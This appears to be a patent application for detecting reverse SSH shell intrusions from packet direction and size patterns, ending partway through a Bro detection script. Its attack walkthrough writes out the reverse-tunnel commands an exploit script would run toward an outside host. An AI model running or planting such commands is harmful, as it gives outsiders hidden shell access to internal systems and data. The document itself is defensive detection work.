  • CROSS REFERENCE TO RELATED APPLICATIONS
  • None.
  • FIELD OF THE INVENTION
  • One or more implementations relate generally to packet-switched networking; and more specifically to detecting unauthorized access to a network resource from an external network.
  • BACKGROUND
  • The subject matter discussed in the background section should not be assumed to be prior art merely as a result of its mention in the background section. Similarly, a problem mentioned in the background section or associated with the subject matter of the background section should not be assumed to have been previously recognized in the prior art. The subject matter in the background section merely represents different approaches, which in and of themselves may also be inventions.
  • In conventional database systems, users access their data resources in one logical database. A user of such a conventional system typically retrieves data from and stores data on the system using the user's own systems. A user system might remotely access one of a plurality of server systems that might in turn access the database system. Data retrieval from the system might include the issuance of a query from the user system to the database system. The database system might process the request for information received in the query and send to the user system information relevant to the request. The secure retrieval of accurate information and subsequent delivery of this information to the user system has been and continues to be a goal of administrators of database systems and other systems that may be deployed on one or more networks.
  • To provide convenient access for a user system to remotely access one or more server systems, the server systems may be connected for communications over an external network such as the Internet. Accordingly, it is desirable to provide techniques to improve security of server systems, including database systems, to protect user's resources, for example, data and applications, without impeding authorized access to those resources over an external network.
  • BRIEF SUMMARY
  • In accordance with embodiments, there are provided mechanisms and methods for detecting unauthorized intrusion via an external network into a server system over a reverse secure shell connection. These mechanisms and methods for reverse shell network intrusion detection can enable embodiments to provide improved security without impeding authorized access to the server system. These mechanisms and methods for reverse shell network intrusion detection can enable embodiments to identify unauthorized devices or network locations that attempt access to the server system, and can stop an authorized transmission of information from the server system. These mechanisms and methods for reverse shell network intrusion detection can be adapted in various embodiments for use in connection with various operating systems, networking environments and protocols within the scope of the present disclosure.
  • In an embodiment and by way of example, a method for reverse shell network intrusion detection is provided. The method embodiment includes monitoring packets in a secure shell session; determining a transmission direction and a payload size of each of the packets; analyzing the transmission directions and payload sizes of a first sequence of the packets relative to a predetermined pattern; based on the first sequence of packets matching the pattern, detecting a response transmitted from the client system to the foreign server; assessing a payload size of the response; and identifying the secure shell session as hosting a reverse shell session based on the response payload size exceeding a predetermined threshold.
  • While one or more implementations and techniques are described with reference to an embodiment in which a method for reverse shell network intrusion detection is implemented in a system providing a front end for an on-demand database service capable of supporting multiple tenants, the one or more implementations and techniques are not limited to multi-tenant databases. For instance, embodiments may be implemented on other computing systems such as laptop, a tablet, a PDA, a workstation, a mobile device, a network system such as a LAN, a WAN, etc. Embodiments may also be practiced using database architectures, such as ORACLE®, DB2® by IBM and the like without departing from the scope of the embodiments.
  • Any of the embodiments described herein may be used alone or together with one another in any combination. The one or more implementations encompassed within this specification may also include embodiments that are only partially mentioned or alluded to or are not mentioned or alluded to at all in this brief summary or in the abstract. Although various embodiments may have been motivated by various deficiencies with the prior art, which may be discussed or alluded to in one or more places in the specification, the embodiments do not necessarily address any of these deficiencies. In other words, different embodiments may address different deficiencies that may be discussed in the specification. Some embodiments may only partially address some deficiencies or just one deficiency that may be discussed in the specification, and some embodiments may not address any of these deficiencies.
  • BRIEF DESCRIPTION OF THE DRAWINGS
  • In the following drawings like reference numbers are used to refer to like elements. Although the following figures depict various examples, the one or more implementations are not limited to the examples depicted in the figures.
  • FIG. 1A shows a block diagram of an example environment in which an on-demand database service or other services may be provisioned over a network.
  • FIG. 1B shows a block diagram of example implementations of elements of FIG. 1A and example interconnections between these elements according to some implementations.
  • FIG. 2A shows a block diagram of a first example environment in which a method for reverse shell network intrusion detection can be used according to some implementations.
  • FIG. 2B shows a block diagram of a second example environment in which a method for reverse shell network intrusion detection can be used according to some implementations. are operational flow diagrams illustrating a high level overview of a technique for [TITLE] in an embodiment;
  • FIGS. 3A-3B illustrate operation of a first shell connection and a reverse shell connection over the first shell connection.
  • FIG. 4 shows an operational flow diagram illustrating a high level overview of a technique for reverse shell network intrusion detection in an embodiment.
  • FIG. 5 shows an operational flow diagram illustrating a high level overview of a whitelist feature of a technique for reverse shell network intrusion detection in an embodiment.
  • DETAILED DESCRIPTION General Overview
  • Systems and methods are provided for reverse shell network intrusion detection. Mechanisms and methods for providing reverse shell network intrusion detection will be described with reference to example embodiments.
  • Examples of systems, apparatus, computer-readable storage media, and methods according to the disclosed implementations are described in this section. These examples are being provided solely to add context and aid in the understanding of the disclosed implementations. It will thus be apparent to one skilled in the art that the disclosed implementations may be practiced without some or all of the specific details provided. In other instances, certain process or method operations, also referred to herein as “blocks,” have not been described in detail in order to avoid unnecessarily obscuring the disclosed implementations. Other implementations and applications also are possible, and as such, the following examples should not be taken as definitive or limiting either in scope or setting.
  • In the following detailed description, references are made to the accompanying drawings, which form a part of the description and in which are shown, by way of illustration, specific implementations. Although these disclosed implementations are described in sufficient detail to enable one skilled in the art to practice the implementations, it is to be understood that these examples are not limiting, such that other implementations may be used and changes may be made to the disclosed implementations without departing from their spirit and scope. For example, the blocks of the methods shown and described herein are not necessarily performed in the order indicated in some other implementations. Additionally, in some other implementations, the disclosed methods may include more or fewer blocks than are described. As another example, some blocks described herein as separate blocks may be combined in some other implementations. Conversely, what may be described herein as a single block may be implemented in multiple blocks in some other implementations. Additionally, the conjunction “or” is intended herein in the inclusive sense where appropriate unless otherwise indicated; that is, the phrase “A, B or C” is intended to include the possibilities of “A,” “B,” “C,” “A and B,” “B and C,” “A and C” and “A, B and C.”
  • Some implementations described and referenced herein are directed to systems, apparatus, computer-implemented methods and computer-readable storage media for detecting a reverse shell connection into a client system from an external network.
  • Example System Overview
  • FIG. 1A shows a block diagram of an example of an environment 10 in which an on-demand database service can be used in accordance with some implementations. The environment 10 includes user systems 12, a network 14, a database system 16 (also referred to herein as a “cloud-based system”), a processor system 17, an application platform 18, a network interface 20, tenant database 22 for storing tenant data 23, system database 24 for storing system data 25, program code 26 for implementing various functions of the system 16, and process space 28 for executing database system processes and tenant-specific processes, such as running applications as part of an application hosting service. In some other implementations, environment 10 may not have all of these components or systems, or may have other components or systems instead of, or in addition to, those listed above.
  • In some implementations, the environment 10 is an environment in which an on-demand database service exists. An on-demand database service, such as that which can be implemented using the system 16, is a service that is made available to users outside of the enterprise(s) that own, maintain or provide access to the system 16. As described above, such users generally do not need to be concerned with building or maintaining the system 16. Instead, resources provided by the system 16 may be available for such users' use when the users need services provided by the system 16; that is, on the demand of the users.
  • Application platform 18 can be a framework that allows the applications of system 16 to execute, such as the hardware or software infrastructure of the system 16. In some implementations, the application platform 18 enables the creation, management and execution of one or more applications. Applications may be developed by the provider of the on-demand database service, by users accessing the on-demand database service via user systems 12, or by third party application developers accessing the on-demand database service via user systems 12.
  • In some implementations, the system 16 implements a web-based customer relationship management (CRM) system. For example, in some such implementations, the system 16 includes application servers configured to implement and execute CRM software applications as well as provide related data, code, forms, renderable web pages and documents and other information to and from user systems 12 and to store to, and retrieve from, a database system related data, objects, and Web page content. In some MTS implementations, data for multiple tenants may be stored in the same physical database object in tenant database 22. In some such implementations, tenant data is arranged in the storage medium(s) of tenant database 22 so that data of one tenant is kept logically separate from that of other tenants so that one tenant does not have access to another tenant's data, unless such data is expressly shared. The system 16 also implements applications other than, or in addition to, a CRM application. For example, the system 16 can provide tenant access to multiple hosted (standard and custom) applications, including a CRM application. User (or third party developer) applications, which may or may not include CRM, may be supported by the application platform 18. The application platform 18 manages the creation and storage of the applications into one or more database objects and the execution of the applications in one or more virtual machines in the process space of the system 16.
  • According to some implementations, each system 16 may be configured to provide web pages, forms, applications, data and media content to user (client) systems 12 to support the access by user systems 12 as tenants of system 16. Additionally, the term “server” is meant to refer to a computing device or system, including processing hardware and process space(s), an associated storage medium such as a memory device or database, and, in some instances, a database application (for example, OODBMS or RDBMS) as is well known in the art. It should also be understood that “server system” and “server” are often used interchangeably herein. Similarly, the database objects described herein can be implemented as part of a single database, a distributed database, a collection of distributed databases, a database with redundant online or offline backups or other redundancies, etc., and can include a distributed database or storage network and associated processing intelligence.
  • The network 14 can be or include any network or combination of networks of systems or devices that communicate with one another. For example, the network 14 can be or include any one or any combination of a LAN (local area network), WAN (wide area network), telephone network, wireless network, cellular network, point-to-point network, star network, token ring network, hub network, or other appropriate configuration. The network 14 can include a TCP/IP (Transfer Control Protocol and Internet Protocol) network, such as the global internetwork of networks often referred to as the “Internet” (with a capital “I”). The Internet will be used in many of the examples herein. However, it should be understood that the networks that the disclosed implementations can use are not so limited, although TCP/IP is a frequently implemented protocol.
  • The user systems 12 can communicate with system 16 using TCP/IP and, at a higher network level, other common Internet protocols to communicate, such as HTTP, FTP, AFS, WAP, etc. In an example where HTTP is used, each user system 12 can include an HTTP client commonly referred to as a “web browser” or simply a “browser” for sending and receiving HTTP signals to and from an HTTP server of the system 16. Such an HTTP server can be implemented as the sole network interface 20 between the system 16 and the network 14, but other techniques can be used in addition to or instead of these techniques. In some implementations, the network interface 20 between the system 16 and the network 14 includes load sharing functionality, such as round-robin HTTP request distributors to balance loads and distribute incoming HTTP requests evenly over a number of servers. In MTS implementations, each of the servers can have access to the MTS data, however, other alternative configurations may be used instead.
  • The user systems 12 can be implemented as any computing device(s) or other data processing apparatus or systems usable by users to access the database system 16. For example, any of user systems 12 can be a desktop computer, a work station, a laptop computer, a tablet computer, a handheld computing device, a wearable device, a mobile cellular phone (for example, a “smartphone”), or any other Wi-Fi-enabled device, wireless access protocol (WAP)-enabled device, or other computing device capable of interfacing directly or indirectly to the Internet or other network. The terms “user system” and “computing device” are used interchangeably herein with one another and with the term “computer.” As described above, each user system 12 typically executes an HTTP client, for example, a web browsing (or simply “browsing”) program, such as a web browser based on the WebKit platform, Microsoft's Internet Explorer browser, Netscape's Navigator browser, Opera's browser, Mozilla's Firefox browser, or a WAP-enabled browser in the case of a cellular phone, PDA or other wireless device, or the like, allowing a user (for example, a subscriber of on-demand services provided by the system 16) of the user system 12 to access, process and view information, pages and applications available to it from the system 16 over the network 14.
  • According to some implementations, each user system 12 and some or all of its components are operator-configurable using applications, such as a browser, including computer code executed using a central processing unit (CPU) such as an Intel Pentium® processor or the like. Similarly, the system 16 (and additional instances of an MTS, where more than one is present) and all of its components can be operator-configurable using application(s) including computer code to run using the processor system 17, which may be implemented to include a CPU, which may include an Intel Pentium® processor or the like, or multiple CPUs.
  • The system 16 includes tangible computer-readable media having non-transitory instructions stored thereon/in that are executable by or used to program a server or other computing system (or collection of such servers or computing systems) to perform some of the implementation of processes described herein. For example, computer program code 26 can implement instructions for operating and configuring the system 16 to intercommunicate and to process web pages, applications and other data and media content as described herein. In some implementations, the computer code 26 can be downloadable and stored on a hard disk, but the entire program code, or portions thereof, also can be stored in any other volatile or non-volatile memory medium or device as is well known, such as a ROM or RAM, or provided on any media capable of storing program code, such as any type of rotating media including floppy disks, optical discs, digital versatile disks (DVD), compact disks (CD), microdrives, and magneto-optical disks, and magnetic or optical cards, nanosystems (including molecular memory ICs), or any other type of computer-readable medium or device suitable for storing instructions or data. Additionally, the entire program code, or portions thereof, may be transmitted and downloaded from a software source over a transmission medium, for example, over the Internet, or from another server, as is well known, or transmitted over any other existing network connection as is well known (for example, extranet, VPN, LAN, etc.) using any communication medium and protocols (for example, TCP/IP, HTTP, HTTPS, Ethernet, etc.) as are well known. It will also be appreciated that computer code for the disclosed implementations can be realized in any programming language that can be executed on a server or other computing system such as, for example, C, C++, HTML, any other markup language, Java™, JavaScript, ActiveX, any other scripting language, such as VBScript, and many other programming languages as are well known may be used. (Java™ is a trademark of Sun Microsystems, Inc.).
  • FIG. 1B shows a block diagram of example implementations of elements of FIG. 1A and example interconnections between these elements according to some implementations. That is, FIG. 1B also illustrates environment 10, but FIG. 1B, various elements of the system 16 and various interconnections between such elements are shown with more specificity according to some more specific implementations. Additionally, in FIG. 1B, the user system 12 includes a processor system 12A, a memory system 12B, an input system 12C, and an output system 12D. The processor system 12A can include any suitable combination of one or more processors. The memory system 12B can include any suitable combination of one or more memory devices. The input system 12C can include any suitable combination of input devices, such as one or more touchscreen interfaces, keyboards, mice, trackballs, scanners, cameras, or interfaces to networks. The output system 12D can include any suitable combination of output devices, such as one or more display devices, printers, or interfaces to networks.
  • In FIG. 1B, the network interface 20 is implemented as a set of HTTP application servers 100 1-100 N. Each application server 100, also referred to herein as an “app server”, is configured to communicate with tenant database 22 and the tenant data 23 therein, as well as system database 24 and the system data 25 therein, to serve requests received from the user systems 12. The tenant data 23 can be divided into individual tenant storage spaces 112, which can be physically or logically arranged or divided. Within each tenant storage space 112, user storage 114 and application metadata 116 can similarly be allocated for each user. For example, a copy of a user's most recently used (MRU) items can be stored to user storage 114. Similarly, a copy of MRU items for an entire organization that is a tenant can be stored to tenant storage space 112.
  • The system 16 of FIG. 1B also includes a user interface (UI) 30 and an application programming interface (API) 32 to system 16 resident processes to users or developers at user systems 12. In some other implementations, the environment 10 may not have the same elements as those listed above or may have other elements instead of, or in addition to, those listed above.
  • Each application server 100 can be communicably coupled with tenant database 22 and system database 24, for example, having access to tenant data 23 and system data 25, respectively, via a different network connection. For example, one application server 100 1 can be coupled via the network 14 (for example, the Internet), another application server 100 N-1 can be coupled via a direct network link, and another application server 100 N can be coupled by yet a different network connection. Transfer Control Protocol and Internet Protocol (TCP/IP) are examples of typical protocols that can be used for communicating between application servers 100 and the system 16. However, it will be apparent to one skilled in the art that other transport protocols can be used to optimize the system 16 depending on the network interconnections used.
  • In some implementations, each application server 100 is configured to handle requests for any user associated with any organization that is a tenant of the system 16. Because it can be desirable to be able to add and remove application servers 100 from the server pool at any time and for various reasons, in some implementations there is no server affinity for a user or organization to a specific application server 100. In some such implementations, an interface system implementing a load balancing function (for example, an F5 Big-IP load balancer) is communicably coupled between the application servers 100 and the user systems 12 to distribute requests to the application servers 100. In one implementation, the load balancer uses a least-connections algorithm to route user requests to the application servers 100. Other examples of load balancing algorithms, such as round robin and observed-response-time, also can be used. For example, in some instances, three consecutive requests from the same user could hit three different application servers 100, and three requests from different users could hit the same application server 100. In this manner, by way of example, system 16 can be a multi-tenant system in which system 16 handles storage of, and access to, different objects, data and applications across disparate users and organizations.
  • In one example storage use case, one tenant can be a company that employs a sales force where each salesperson uses system 16 to manage aspects of their sales. A user can maintain contact data, leads data, customer follow-up data, performance data, goals and progress data, etc., all applicable to that user's personal sales process (for example, in tenant database 22). In an example of a MTS arrangement, because all of the data and the applications to access, view, modify, report, transmit, calculate, etc., can be maintained and accessed by a user system 12 having little more than network access, the user can manage his or her sales efforts and cycles from any of many different user systems. For example, when a salesperson is visiting a customer and the customer has Internet access in their lobby, the salesperson can obtain critical updates regarding that customer while waiting for the customer to arrive in the lobby.
  • While each user's data can be stored separately from other users' data regardless of the employers of each user, some data can be organization-wide data shared or accessible by several users or all of the users for a given organization that is a tenant. Thus, there can be some data structures managed by system 16 that are allocated at the tenant level while other data structures can be managed at the user level. Because an MTS can support multiple tenants including possible competitors, the MTS can have security protocols that keep data, applications, and application use separate. Also, because many tenants may opt for access to an MTS rather than maintain their own system, redundancy, up-time, and backup are additional functions that can be implemented in the MTS. In addition to user-specific data and tenant-specific data, the system 16 also can maintain system level data usable by multiple tenants or other data. Such system level data can include industry reports, news, postings, and the like that are sharable among tenants.
  • In some implementations, the user systems 12 (which also can be client systems) communicate with the application servers 100 to request and update system-level and tenant-level data from the system 16. Such requests and updates can involve sending one or more queries to tenant database 22 or system database 24. The system 16 (for example, an application server 100 in the system 16) can automatically generate one or more SQL statements (for example, one or more SQL queries) designed to access the desired information. System database 24 can generate query plans to access the requested data from the database. The term “query plan” generally refers to one or more operations used to access information in a database system.
  • Each database can generally be viewed as a collection of objects, such as a set of logical tables, containing data fitted into predefined or customizable categories. A “table” is one representation of a data object, and may be used herein to simplify the conceptual description of objects and custom objects according to some implementations. It should be understood that “table” and “object” may be used interchangeably herein. Each table generally contains one or more data categories logically arranged as columns or fields in a viewable schema. Each row or element of a table can contain an instance of data for each category defined by the fields. For example, a CRM database can include a table that describes a customer with fields for basic contact information such as name, address, phone number, fax number, etc. Another table can describe a purchase order, including fields for information such as customer, product, sale price, date, etc. In some MTS implementations, standard entity tables can be provided for use by all tenants. For CRM database applications, such standard entities can include tables for case, account, contact, lead, and opportunity data objects, each containing pre-defined fields. As used herein, the term “entity” also may be used interchangeably with “object” and “table.”
  • In some MTS implementations, tenants are allowed to create and store custom objects, or may be allowed to customize standard entities or objects, for example by creating custom fields for standard objects, including custom index fields. Commonly assigned U.S. Pat. No. 7,779,039, titled CUSTOM ENTITIES AND FIELDS IN A MULTI-TENANT DATABASE SYSTEM, by Weissman et al., issued on Aug. 17, 2010, and hereby incorporated by reference in its entirety and for all purposes, teaches systems and methods for creating custom objects as well as customizing standard objects in a multi-tenant database system. In some implementations, for example, all custom entity data rows are stored in a single multi-tenant physical table, which may contain multiple logical tables per organization. It is transparent to customers that their multiple “tables” are in fact stored in one large table or that their data may be stored in the same table as the data of other customers.
  • In some implementations of a cloud-based system, or other on-demand service, many of the various processes, including for example, system processes 102 and individual tenant processes 104, may submit messages (aka tasks) to the message queue system. Messages or tasks may involve a wide range of activities; for example, generating monthly sales reports or updating the contact information for a list of clients, just to name a few. Message queue provides a system to queue, schedule and execute these messages in an asynchronous manner. That is, the tenant submitting the message need not wait for the execution and completion of the message. A message “sender” can send a message into the messaging system, and then proceed to other tasks without having to wait for a reply. Similarly, a receiver may receive the message at a later time without direct interaction with the sender. In some systems, some messages may be processed by a “message broker” which is an entity responsible for receiving the message, holding it until delivery, and delivering it to the appropriate receiver(s). Various messaging protocols may be used. One example is an open standard application layer protocol called the Advanced Message Queuing Protocol (AMQP), wire-level protocol. Apache Qpid™ among others provide messaging tools that implement the AMQP protocol. We will use the term Qpid (pronounced “Cupid”) herein to mean any messaging protocol or system.
  • Reverse Shell Network Intrusion Detection
  • Referring now to FIG. 2A, it shows a block diagram of an example environment in which a method for reverse shell network intrusion detection can be used according to some implementations. In the drawing, a client system 200 represents any server, server system or the like. The client system 200 may be coupled to a network or it may include a network. We refer to the network associated with client system 200 as an internal network 150. Using this environment by way of example, we will show how embodiments of the present disclosure can be used to detect a reverse shell connection or “intrusion” into the client system from a foreign system, meaning one that is outside of the internal network 150. Although the term “intrusion” may imply an unauthorized connection, we also describe below how authorized connections also may be detected and permitted to operate. The internal network 150 may be of any size; it may comprise only a single server or computer (we use the terms interchangeably) or many of them. The internal network may correspond to a system such as system 16 illustrated in FIGS. 1A-1B. In that regard, embodiments of the present disclosure may be used to help protect a system like such as a cloud-based database system 16, or other systems, from unauthorized intrusions. As in the earlier figures, the internal network 150 may be coupled via connection 210 to a network 14. In particular, the client system 200 may provide a network interface/Internet software layer 20 for connection to the network 14. The connection 210 may be a packet-switched network connection, enables by a network interface/Internet software layer 208. A transport layer and optional firewall 206 may be operatively coupled to the network layer 208, details of which are well known.
  • A “shell” is originally a UNIX term for an interactive user interface for interaction with an operating system. In general, a shell is the layer of programming that understands and executes commands entered by a user, for example, through a keyboard or text console. In some systems, the shell is called a command interpreter. A shell usually implies an interface with a command syntax. As one example, a login shell is the first process that executes under a user ID for a typical interactive session on a server. For illustration, we show a shell program deployed in the client system 200. In more detail, a shell may comprise a shell client portion 202 which is the part that interacts with user inputs. A shell server portion 204 “listens” to the lower level software layers 206 to detect and respond to an incoming shell session request. The incoming request may be coming from a shell client outside the system 200 for example, via the network 14 as explained in more detail below.
  • The term “SSH” used in the figure refers to a “secure shell” client or server program. A secure shell can be used to make an interactive session with a remote server more secure. Secure Shell (SSH), sometimes known as Secure Socket Shell, sometimes refers to a UNIX-based command interface and protocol for securely getting access to a remote computer. It is widely used by network administrators to control Web and other kinds of servers remotely. We use the term “SSH” herein, however, to mean generically any secure shell software; that is, software that enables an encrypted shell connection. The UNIX SSH program is just one example. The name “ssh” (lower case) refers to an OpenSSH client (remote login program) in the OpenBSD manual pages. There are also Linux shell implementations, among others. That said, for interoperability, most secure shell implementations comply with the SSH protocol specifications. In general, SSH provides a secure channel over an unsecured network in a client-server architecture, connecting an SSH client application with an SSH server. Common applications include remote command-line login and remote command execution. The problem is that remote command execution may be used by an unauthorized person or machine to access resources or data on a client system such as system 200, or any other resource on internal network 150.
  • Referring again to FIG. 2A, on the right side, a “foreign system” 220 is illustrated and connected via 240 to the network 14. The term “foreign system” in this context means any system outside of the internal network 150; it does not imply any physical location. Technically, we use “foreign system” to mean any system on the network 14 side of the network interface 20 in FIG. 1A or the network interface 208 in FIG. 2A. The foreign system 220 may comprise a network interface 230, transport layer/firewall 228, etc. similar to the client system 200. The general description of the client system 200 and internal network 150 are applicable to the foreign system 220 and external network 160, respectively. In the illustrated foreign system 220, a shell client component 224 and a shell server component 226 are deployed.
  • FIG. 3A illustrates operation of shell connections in more detail. Here, an “exploit script” 326 has been stored in the client system 200. A script may be inserted into a client system through various means, for example, by physical connection of a storage device that contains the script to the client system 200, directly or via the internal network. More commonly, an exploit (or “malicious”) script may arrive via an email or it may be downloaded (intentionally or inadvertently) from a web site. The exploit script may cause the shell client component 322 to initiate a shell connection, for example, over a network (14 in FIG. 2B), to a foreign system 220. In one example, the shell client reaches out to an external system by executing a shell command which may be of the form “ssh -R 2222:localhost:22 user@ExternalHost.” The “ssh” part instructs starting the shell client program. Various parameters may be appended, for example, see the OpenBSD manual pages for details, available at http://openbsd.org. “-R” option indicates destination address, here 2222:localhost:22 and then “user@hostname.” The destination address (of the foreign system) is specified in the exploit script. In response to this command, the shell client 322 transmits a message 336 to the specified address to login to the remote machine; here, the message is received by a shell server component 332 running on the foreign system 220. This establishes a “forward” shell session 336. The connection is bidirectional, enabling the shell server 332 to respond to packets it receives, for example, by sending an echo of a received character and/or an acknowledgement (ACK) packet 340. The specific protocols will depend on the operating systems in use. Some examples are given below. The forward shell connection 350 is considered secure in that traffic over it will be encrypted.
  • Turning to FIG. 3B, the forward shell connection 350 has been established. Now, the shell client component 334 on the foreign system initiates a shell connection in the reverse direction, i.e., from the foreign system back into the client system. To do so, the shell client sends a command to open a shell session, but it sends that command over the already open forward connection 350. In this way, the reverse connection is not detected by a typical firewall or similar component, because there is no new connection—the reverse connection is operating over the already established forward connection 350.
  • Continuing the present example, the foreign system (shell client 334) sends a command such as “SSH -p 2222 user@localhost, indicated by solid arrow 360, which is received by the shell server component 324 on the client system 200. This enables the foreign system to establish a (reverse) shell connection and execute commands as if it was on the same network, namely internal network 150. The -p parameter specifies the port (2222) to connect to on the remote host, in this case the client system 200, which is the same port as the forward connection already in use. In this way, the reverse connection utilizes the extant forward connection. The shell server 324 may send a reply over the reverse connection, indicated at dashed line 362. The reply may comprise an echo of a received character, and in some cases an ACK packet, as further explained below. This reverse shell connection enables the foreign system (or a user of the foreign system), manually or programmatically, to execute shell level commands to explore the file structure, learn what resources and data are on the client system, or available to it, and potentially to obtain copies or download such resources and data. For example, the foreign system may gain access to tenant data storage in a cloud-based database system of the type illustrated in FIGS. 1A-1B. The reverse connection escapes notice by a typical firewall 206 or the like, because it utilizes the already existing connection 350 which originated from the client system inside the internal network.
  • Referring again to FIG. 2A, we next describe ways to detect a reverse shell connection in several embodiments. The embodiments described are merely illustrative and not intended to be limiting. The concepts disclosed can be applied and adapted to a variety of different hardware, software and networking environments and protocols, many of which continue to evolve. In FIG. 2A, a network intrusion detection system (“NIDS”) 250 may be implemented, for example, on a server system. The NIDS 250 may be coupled to via 213 (by cable, wireless, induction, or any other means) so as to monitor packet data traffic via 210, in other words, traffic between the client system 200 and a network 14, which may in turn pass traffic to and from the foreign system 220. The NIDS 250 is configured to inspect individual packets, read header data, determine payload size, and ascertain other parameters on a per packet basis. Here, the NIDS is configured to detect reverse shell connections, i.e. shell sessions in which an external or foreign system such as foreign system 220 is sending shell commands to the client system 200 over a forward shell connection that originated at the client system. Various hardware and software products are known for inspecting network data packets in general. FIG. 2B illustrates an alternative embodiment in which an NIDS 280 is deployed in the client system 200. The NIDS 280 has essentially the same functionality as the external NIDS 250 in FIG. 2A.
  • In some embodiments, the NIDS (250 or 280) may be implemented in a network traffic analyzer. “Bro” is one example of a passive, open-source network traffic analyzer. It is primarily a security monitor that inspects all traffic on a link in depth for signs of suspicious activity. Bro provides users with a domain-specific scripting language for expressing arbitrary analysis tasks. It terms of deployment, Bro and similar products are commercially available and configurable to run on commodity hardware on standard UNIX-style operating systems (including Linux, FreeBSD, and MacOS). The Bro scripting language may indeed be utilized for intrusion detection, as explained below. FIG. 2A shows a detection script 270, which may be a Bro script in some embodiments, arranged for execution on the NIDS 250.
  • FIG. 4 shows an operational flow diagram 400 illustrating a high level overview of a process for reverse shell network intrusion detection in one embodiment. A process such as 400 preferably is implemented in software. It may be implemented in a Bro script, in some embodiments, as shown below. In process 400, after initialization 402, which may include loading a selected script for execution, the process watches for a secure shell connection, decision block 404. It loops until a shell connection is detected, and the proceeds to capture a traffic packet, process block 406. Typically, the term “capture” here refers to passively inspecting a packet, not removing it from the network or even modifying it. Next, the process determines whether the direction of the packet is from a shell server to a shell client, decision block 410. If not, the process loops via path 412 back to capture a next packet at block 406. It can be appreciated that this process must be fast enough to inspect packets in real time, if it is to provide real-time network intrusion protection. In some other embodiments, packet traffic may be recorded, and analyzed after the fact, to determine whether or not an intrusion occurred. This process may be related, although it is not limited to, the scenario in FIG. 3B. That is, the process 400 “watches” for a shell connection (350 in FIG. 3B), and then analyzes packet traffic (360, 362 in FIG. 3B) over the shell connection to detect a reverse shell connection, as follows.
  • If the direction of the first packet is shell server to client, the process next determines whether the packet size is equal to a particular value (integer “M” bytes) at decision block 414. Packet size is explained below. If the first packet is not size M, the process loops via 416 back to block 406 to inspect a next packet. If the first packet is size M (“YES” path), the process captures the next packet, block 418. The process loops if necessary to wait for the next packet in the current sequence of packets. The “current sequence” refers to packet traffic over the shell connection detected at 404; other packets may be ignored for present purposes. The process 400 then inspects the next (second) packet to determine, at decision block 420, whether the direction of this packet is from shell client to shell server, in other words, opposite to the direction of the first packet. If not, the process loops back via 422 to block 406 to essentially re-start looking for a particular sequence of packets as described here.
  • Responsive to an affirmative determination at 420, (“YES” path), the process continues to determine, at decision block 424, whether the second packet size equals M. At decision block 424, if the (second) packet size is not M, the process loops back via 426 again to block 406. If it is size M, the process continues to block 430 to capture a next packet. If the next packet is not an ACK, decision block 432, the process again loops back via 434 (-426-422-416-412) to block 406. In other words, to proceed downward through this flow diagram 400, thus far, a first packet must have a given direction and specified size, and it must be followed by a next (second) packet having a direction opposite to the first given direction, and also have the same specified size (M), and the next (third) packet must be an ACK packet. In this discussion, we use the term “next packet” to mean a subsequent packet following a first packet in a sequence of packets, with no packet intervening between the first packet and the subsequent packet in the same sequence.
  • Responsive to an affirmative determination at 432, that the current packet is an ACK packet, the process increments a character count, block 438. This count reflects the number of characters, so far, successfully sent (in succession) from the shell server to the shell client. Decision block 439 tests whether the count equals or exceeds predetermined threshold, for example, two or three characters. This concept may be expanded to recognize variations and options appended to shell commands, which may make them longer than two or three characters. If the threshold character count is not met at 439, the process 400 continues back to block 406 to capture and inspect subsequent packets.
  • Alternatively, if the threshold character count is met, the process captures a next packet, block 440, tests the direction of that packet, decision 441, and if the packet is in the direction client to server (“YES”), it next tests whether the packet size exceeds a predetermined size R, decision block 442. R is a selected integer reflecting a packet size, for example, in bytes, that exceeds the size of a single character packet (for example, M). This is to determine whether the current packet is likely to be a response (by the client) to a shell command (from the shell server). Responsive to a determination at 442 that the packet size is not greater than R, the process loops back via path 444 to block 406. Responsive to a determination at 442 that the packet size is greater than R, the process indicates or reports the detection of a reverse shell connection at block 450, and then exit or return, block 460. Various actions may be taken in response to the detection, some of which are described later.
  • To summarize, in this embodiment, the process 400 detects a reverse shell connection based on a packet sequence of:
      • server to client, size M bytes
      • client to server, size M bytes
      • client to server, ACK packet
      • the foregoing sequence repeated at least twice(threshold character count) without interruption.
      • and then a larger packet (size>R bytes) follows from client to server, indicative of a response to a shell command.
  • So, for example, the exchange may send the letter “l” from the shell server to the shell client. Depending on the systems in use, the size M may be 96 bytes, for reasons explained below. The client echoes back the letter “l”, and the client follows that echo with an ACK packet. Next, repeating that sequence, the server may send the character “s”- and again the client echoes that back, plus an ACK packet. Finally, a larger packet follows. The shell command “ls” (list files) was sent from the shell server, and the response, namely a list of files in the current directory on the client system, will almost certainly have a size greater than a single character. So R should be set to be an integer greater than M. Some shell commands are greater than two characters long, for example, “cat” (show content of file). In such cases, the above sequence will be repeated three times, reflecting the three-character command, with each one echoed and acknowledged.
  • Process 400 illustrates just one example or embodiment of this process; it will vary for different network protocols, shell programs, operating systems, etc. Some other examples are illustrated by the following sample scripts.
  • Sample Script No. 1—Linux to Linux Version
  •   # Detects when multiple characters have been typed
      into a reverse SSH shell and returned.
      # Linux to Linux version 1.0
      global lssh_conns:table[string] of count &redef;
      global linux_echo:table[string] of count &redef;
      #redef enum Notice::Type += {SSH_Reverse_Shell};
      event ssh_server_version(c: connection, version: string)
      {
       if ( c$uid !in lssh_conns )
       {
       lssh_conns[c$uid] = 0;
       linux_echo[c$uid] = 0;
       }
       if ( c$uid !in linux_echo )
       {
       linux_echo[c$uid] = 0;
       }
      }
      event new_packet(c: connection, p: pkt_hdr)
      {
      ##if ( p$ip$p != 6 ) { return; } ## Doesn't work
      if ( ! c?$service ) { return; }
      if ( /SSH/ !in cat(c$service) ) { return; }
      local is_src:bool &default=F;
      if ( p$ip$src == c$id$orig_h ) { is_src = T; }
      if ( p$ip$src != c$id$orig_h ) { is_src = F; }
      if ( is_src == F && p$tcp$dl == 96 && lssh_conns[c$uid] == 0 )
       {
        lssh_conns[c$uid] += 1;
        return;
       }
      if ( is_src == T && p$tcp$dl == 96 && lssh_conns[c$uid] == 1 )
      {
       lssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == F && p$tcp$dl == 0 && lssh_conns[c$uid] == 2 )
      {
       lssh_conns[c$uid] += 1;
       return;
      }
      if ( is_src == F && p$tcp$dl == 96 && lssh_conns[c$uid] >= 3 )
       {
        lssh_conns[c$uid] += 1;
       return;
       }
      if ( is_src == T && p$tcp$dl == 96 && lssh_conns[c$uid] >= 4 )
      {
